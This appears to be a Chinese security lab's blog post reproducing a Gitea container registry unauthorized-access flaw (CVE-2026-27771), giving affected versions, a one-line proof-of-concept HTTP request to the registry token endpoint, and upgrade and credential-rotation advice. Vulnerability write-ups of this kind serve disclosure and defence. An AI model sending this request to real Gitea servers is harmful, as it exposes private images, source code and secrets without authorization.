文章总结： Gitea容器镜像仓库存在未授权访问漏洞CVE-2026-27771，影响1.26.2之前版本。攻击者可通过registrytoken接口获取私有镜像信息导致源码、密钥等敏感数据泄露。厂商已发布补丁，建议立即升级至1.26.2版本并轮换已泄露凭证。 综合评分： 85 文章分类： 漏洞分析,漏洞预警,解决方案,云安全,数据安全

【成功复现】Gitea未授权信息泄露漏洞(CVE-2026-27771)

原创

弥天安全实验室 弥天安全实验室

弥天安全实验室

2026年6月18日 21:36 陕西

在小说阅读器读本章

去阅读

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Gitea是一款开源自托管的版本控制协作平台，提供代码托管、项目管理、容器镜像托管等功能，支持用户自定义部署私有实例，同时支持创建公有、私有代码和镜像仓库，广泛应用于企业内部开发协作与版本管理场景。

Gitea 内置 Container Registry 存在访问控制缺陷。未授权远程攻击者可通过 registry token 与 catalog/pull 接口访问原本应受保护的容器镜像信息，可能导致私有容器镜像、源码产物、配置和敏感信息泄露，进而泄露源代码、密钥、环境配置和生产基础设施信息。

0x02影响版本

Gitea < 1.26.2

0x03漏洞复现

1.访问环境

2.漏洞复现

poc

GET /v2/token?service=container_registry&scope=* HTTP/1.1Host: 127.0.0.1:15001

通过响应判断漏洞存在

0x04修复建议****

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

升级 Gitea 至 1.26.2 或更高版本；确认内置 Container Registry 的访问控制策略已正确生效；对曾暴露的私有镜像、密钥和部署凭据进行排查和轮换。

建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://github.com/go-gitea/gitea/releases/tag/v1.26.2https://github.com/portbuster1337/CVE-2026-27771

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室 弥天安全实验室《【成功复现】Gitea未授权信息泄露漏洞(CVE-2026-27771)》